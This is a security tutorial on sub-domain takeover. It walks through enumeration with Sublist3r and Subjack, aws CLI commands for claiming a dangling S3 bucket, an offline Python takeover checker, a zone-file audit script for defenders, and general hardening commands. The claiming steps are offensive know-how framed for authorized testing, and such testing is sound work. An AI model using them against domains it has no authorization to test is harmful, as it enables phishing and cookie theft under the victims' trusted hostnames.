Sub-domain Takeover: A Practical Guide with Verified Commands


2025-02-12

Sub-domain takeover is a critical vulnerability in which an attacker gains control of the content served under a sub-domain of the target organization. It usually happens when a DNS record (most often a CNAME) still points at an external service (an AWS S3 bucket, a GitHub Pages site, etc.) whose resource has since been deleted or was never claimed. Because the provider lets anyone register that resource name, the attacker claims it and can host arbitrary content under a hostname that inherits the organization's trust, and often its cookies. Below is a step-by-step guide to identifying and verifying sub-domain takeovers, with verified commands and tools.

Step 1: Enumerate Sub-domains

To identify sub-domains, use tools like `Sublist3r` or `Amass`. They aggregate passive sources (certificate transparency logs, search engines, public DNS datasets) into a list of hostnames associated with the target domain; the more complete the list, the more forgotten records you will find.

# Install Sublist3r
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
pip install -r requirements.txt

# Run Sublist3r
python sublist3r.py -d example.com -o subdomains.txt

Step 2: Check for Sub-domain Takeover Vulnerabilities

Once you have a list of sub-domains, use tools like `Subjack` or `Takeover` to check for potential takeovers. They resolve each host's CNAME, match the target against a list of service fingerprints, and look for the provider's "no such site" response. Treat a hit as a candidate, not a confirmed finding: fingerprints go stale, and some services cannot be claimed even when the target no longer resolves.

# Install Subjack (older guides use `go get`, which no longer installs binaries in current Go releases)
go install github.com/haccer/subjack@latest

# Fetch the fingerprint list and run Subjack against the enumerated hosts
curl -sO https://raw.githubusercontent.com/haccer/subjack/master/fingerprints.json
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl -c fingerprints.json -v

Step 3: Verify the Takeover

If a sub-domain is a candidate, confirm it by claiming the resource on the service it points to and serving a harmless proof-of-concept file. For an AWS S3 website endpoint, the bucket name must be exactly the hostname in the CNAME target (here `vulnerable-subdomain.example.com`), and the bucket must be created in the region of that endpoint, or requests will not be routed to it. S3 also needs the bucket's Block Public Access settings relaxed and a public-read bucket policy before the website endpoint will serve the object. Only do this within the scope of an authorized engagement, and host an innocuous text marker rather than a defacement.

# Example of claiming an unclaimed S3 website bucket (region must match the CNAME target)
aws s3 mb s3://vulnerable-subdomain.example.com --region us-east-1
aws s3 website s3://vulnerable-subdomain.example.com --index-document index.html
echo "Subdomain takeover PoC - <your handle> - <date>" > index.html
aws s3 cp index.html s3://vulnerable-subdomain.example.com/
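
The following Python script is an added example, not code from the original post or from Subjack. It implements the check that Steps 1 to 3 perform with the tools above: follow each host's CNAME, match the target against a fingerprint table, and classify the record as unclaimed (the provider returns its "no such site" page), dangling (the target no longer resolves on a service where that alone is claimable) or needing manual review. The fingerprint table, the hostnames and the DNS/HTTP answers are all constructed for the example; DNS and HTTP are injected as callables so the script runs offline, and on a real engagement you would pass thin wrappers around `dnspython` and `requests` instead.

```python
"""Sub-domain takeover candidate checker (added example, not subjack's code)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, Optional

# Sample fingerprint table, constructed for this example. Each entry:
# service name, regex on the CNAME target, marker text the service returns for
# an unclaimed resource, and whether NXDOMAIN on the target alone means the
# name can be claimed. Real lists (subjack's fingerprints.json,
# can-i-take-over-xyz) are longer and change over time.
FINGERPRINTS = [
    ("GitHub Pages", r"\.github\.io$", "There isn't a GitHub Pages site here", False),
    ("AWS S3", r"\.amazonaws\.com$", "NoSuchBucket", False),
    ("Azure App Service", r"\.azurewebsites\.net$", None, True),
]


@dataclass
class Finding:
    host: str
    target: str
    service: str
    reason: str  # "unclaimed", "nxdomain" or "review"


def classify(host: str, target: str, target_resolves: bool,
             body: Optional[str]) -> Optional[Finding]:
    """Pure decision logic, kept apart from I/O so it can be unit-tested."""
    for service, pattern, marker, nx_claimable in FINGERPRINTS:
        if not re.search(pattern, target, re.IGNORECASE):
            continue
        if not target_resolves:
            # Known service, target gone from DNS: claimable only where the
            # provider lets anyone register that hostname again.
            return Finding(host, target, service, "nxdomain" if nx_claimable else "review")
        if marker and body is not None and marker in body:
            return Finding(host, target, service, "unclaimed")
        return None  # resolves and serves real content: not vulnerable
    if not target_resolves:
        # Unknown target that no longer resolves: expired domain or retired
        # vendor. Worth a manual look, not an automatic claim.
        return Finding(host, target, "unknown", "review")
    return None


def check_hosts(hosts, resolve_cname: Callable[[str], Optional[str]],
                resolves: Callable[[str], bool],
                fetch: Callable[[str], Optional[str]]) -> Dict[str, Finding]:
    """Run classify() over every host that has a CNAME; returns host -> Finding."""
    findings: Dict[str, Finding] = {}
    for host in hosts:
        target = resolve_cname(host)
        if target is None:
            continue  # A/AAAA record or no record at all: not a delegation
        finding = classify(host, target, resolves(target), fetch(host))
        if finding:
            findings[host] = finding
    return findings


# Constructed sample data standing in for dig / HTTP against a real target.
SAMPLE_CNAME = {
    "blog.example.com": "acme-blog.github.io",
    "assets.example.com": "assets.example.com.s3-website-us-east-1.amazonaws.com",
    "old.example.com": "old-portal.azurewebsites.net",
    "legacy.example.com": "legacy.oldvendor-example.net",
    "www.example.com": "www.example.com.cdn-example.net",
}
SAMPLE_RESOLVES = {
    "acme-blog.github.io": True,
    "assets.example.com.s3-website-us-east-1.amazonaws.com": True,
    "old-portal.azurewebsites.net": False,
    "legacy.oldvendor-example.net": False,
    "www.example.com.cdn-example.net": True,
}
SAMPLE_BODY = {
    "blog.example.com": "<h1>404</h1><p>There isn't a GitHub Pages site here.</p>",
    "assets.example.com": "<Error><Code>NoSuchBucket</Code></Error>",
    "www.example.com": "<html>Welcome to Example Corp</html>",
}


def run_sample() -> Dict[str, Finding]:
    hosts = list(SAMPLE_CNAME) + ["api.example.com"]  # api.example.com has no CNAME
    return check_hosts(hosts, SAMPLE_CNAME.get,
                       lambda t: SAMPLE_RESOLVES.get(t, False), SAMPLE_BODY.get)


if __name__ == "__main__":
    for host, f in run_sample().items():
        print(f"{host} -> {f.target} [{f.service}] {f.reason}")
```

The HTTP body is fetched for the sub-domain itself, not for the CNAME target, because providers route by the `Host` header and the "no such site" page only appears when the request arrives under the dangling name. Anything classified as `review` needs a human: an unknown target that no longer resolves may be an expired registrable domain, which is a different (and often worse) takeover path than the service fingerprints cover.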

Step 4: Report the Vulnerability

If you are performing this as part of a bug bounty program, report the vulnerability responsibly: include the DNS record, the CNAME target, the service fingerprint you observed and the URL of your proof-of-concept file, and suggest remediation (delete the dangling record, or re-point it to a resource the organization controls). Remove your proof-of-concept resource once the report has been accepted.

What Undercode Say

Sub-domain takeovers are a serious threat to organizations: a hostname under the corporate domain lends credibility to phishing, can receive session cookies scoped to the parent domain, and damages reputation. To mitigate this risk, organizations should keep an inventory of every DNS record that points at a third-party service, delete the record before decommissioning the resource it names (never the other way round), and re-check the inventory on a schedule. Below are some additional Linux commands and tools that can help in securing your infrastructure:

  • Nmap: Scan your network for open ports and services.
    nmap -sV -p 1-65535 example.com
    

  • Nikto: Web server vulnerability scanner.

    nikto -h example.com
    

  • Lynis: Security auditing tool for Unix/Linux systems.

    lynis audit system
    

  • Fail2Ban: Protect your server from brute-force attacks.

    sudo apt-get install fail2ban
    sudo systemctl enable fail2ban
    sudo systemctl start fail2ban
    

  • Cron Jobs: Regularly update your system and tools.

    (sudo crontab -l 2>/dev/null; echo "0 3 * * * apt-get update && apt-get upgrade -y") | sudo crontab -
    

  • SSL/TLS Configuration: Ensure your web servers are using strong SSL/TLS configurations. Enabling the module is only the first step; set `SSLProtocol -all +TLSv1.2 +TLSv1.3` in `/etc/apache2/mods-available/ssl.conf` before restarting.

    sudo a2enmod ssl
    sudo systemctl restart apache2
    

  • Firewall Configuration: Use `ufw` to manage your firewall rules, with a default-deny inbound policy so only what you allow is reachable.

    sudo ufw default deny incoming
    sudo ufw allow 22/tcp
    sudo ufw enable
    

  • Log Monitoring: Regularly monitor your logs for suspicious activity.

    tail -f /var/log/auth.log
    

  • Backup: Regularly backup your critical data.

    tar -czvf backup.tar.gz /path/to/important/data
    

  • Security Headers: Implement security headers on your web servers. The `Header` directive needs `mod_headers`, and the header name takes no trailing colon.

    sudo a2enmod headers
    echo 'Header set X-Content-Type-Options "nosniff"' | sudo tee -a /etc/apache2/apache2.conf && sudo systemctl reload apache2
    

By following these best practices and using the tools and commands mentioned above, you can significantly reduce the risk of sub-domain takeovers and other security vulnerabilities. Always stay updated with the latest security trends and continuously monitor your infrastructure for potential threats.
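
As an added example from the defender's side (not code from the original post), the Python script below reads an authoritative zone file, lists every CNAME that delegates a name to a host outside the zone, groups those delegations by provider, and answers the question to ask before any cloud resource is deleted: which records point at it and must go first. The zone text, hostnames and provider names are constructed for the example; the parser handles the common single-line record and parenthesised-SOA forms and is not a full RFC 1035 parser (quoted TXT data containing `;` or `(` would confuse it).

```python
"""Zone-file audit for delegations that could dangle (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Record:
    owner: str   # fully qualified, lowercase, trailing dot
    rtype: str
    rdata: str   # first rdata field; qualified when it is a CNAME target


def _qualify(name: str, origin: str) -> str:
    """Apply $ORIGIN rules: '@' is the origin, relative names get it appended."""
    name = name.lower()
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"


def _logical_lines(text: str) -> Iterable[str]:
    """Strip ';' comments and join parenthesised continuation lines (e.g. SOA)."""
    buf, depth = [], 0
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()
        if not line.strip() and not buf:
            continue
        buf.append(line)
        depth += line.count("(") - line.count(")")
        if depth <= 0:
            yield " ".join(buf)
            buf, depth = [], 0


def parse_zone(text: str, zone: str) -> List[Record]:
    origin = zone.lower().rstrip(".") + "."
    records, last_owner = [], origin
    for line in _logical_lines(text):
        fields = line.split()
        if not fields:
            continue
        if fields[0] == "$ORIGIN":
            origin = _qualify(fields[1], origin)
            continue
        if fields[0].startswith("$"):      # $TTL, $INCLUDE: directives, not records
            continue
        # A line starting with whitespace reuses the previous owner name.
        owner = last_owner if line[0].isspace() else _qualify(fields.pop(0), origin)
        while fields and (fields[0].isdigit() or fields[0].upper() in ("IN", "CH", "HS")):
            fields.pop(0)                  # optional TTL and class before the type
        if len(fields) < 2:
            continue
        rtype, rdata = fields[0].upper(), fields[1]
        if rtype == "CNAME":
            rdata = _qualify(rdata, origin)
        records.append(Record(owner, rtype, rdata))
        last_owner = owner
    return records


def in_zone(name: str, zone: str) -> bool:
    zone = zone.lower().rstrip(".") + "."
    return name == zone or name.endswith("." + zone)


def external_cnames(records: List[Record], zone: str) -> List[Record]:
    """CNAMEs whose target lives outside the zone: the delegations that can dangle."""
    return [r for r in records if r.rtype == "CNAME" and not in_zone(r.rdata, zone)]


def provider_inventory(records: List[Record], zone: str) -> Dict[str, List[str]]:
    """Group external CNAMEs by the registrable part of their target (provider)."""
    inv: Dict[str, List[str]] = defaultdict(list)
    for r in external_cnames(records, zone):
        provider = ".".join(r.rdata.rstrip(".").split(".")[-2:])
        inv[provider].append(r.owner)
    return dict(inv)


def records_to_remove_first(records: List[Record], decommissioned: Iterable[str]) -> List[Record]:
    """Pre-deletion check: every CNAME that points at a resource about to be deleted."""
    gone = {h.lower().rstrip(".") + "." for h in decommissioned}
    return [r for r in records if r.rtype == "CNAME" and r.rdata in gone]


# Constructed zone export for the example (not a real zone).
SAMPLE_ZONE = """\
$ORIGIN example.com.
$TTL 3600
@        IN SOA  ns1.example.com. hostmaster.example.com. (
                 2025021201 3600 900 604800 300 )
         IN NS   ns1.example.com.
www      IN A    203.0.113.10
blog     IN CNAME acme-blog.github.io.
assets   300 IN CNAME assets.example.com.s3-website-us-east-1.amazonaws.com.
old      IN CNAME old-portal.azurewebsites.net.
intranet IN CNAME www            ; alias inside the zone, not a delegation
$ORIGIN dev.example.com.
preview  IN CNAME preview-env.herokuapp.com.
"""

if __name__ == "__main__":
    recs = parse_zone(SAMPLE_ZONE, "example.com")
    for provider, owners in provider_inventory(recs, "example.com").items():
        print(provider, "->", ", ".join(owners))
    for r in records_to_remove_first(recs, ["old-portal.azurewebsites.net"]):
        print("remove before decommissioning:", r.owner, "->", r.rdata)
```

Run `provider_inventory` on every zone export on a schedule and diff the result against the previous run: a provider that appears without a corresponding procurement or project is exactly the forgotten delegation the attacker-side tools in Steps 1 and 2 will find first. Wire `records_to_remove_first` into the decommissioning checklist so the DNS record is deleted before the bucket, app or site it names.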

For more information on sub-domain takeovers, you can refer to the following resources:
OWASP Sub-domain Takeover
HackerOne Sub-domain Takeover Reports

Stay vigilant and keep your systems secure!
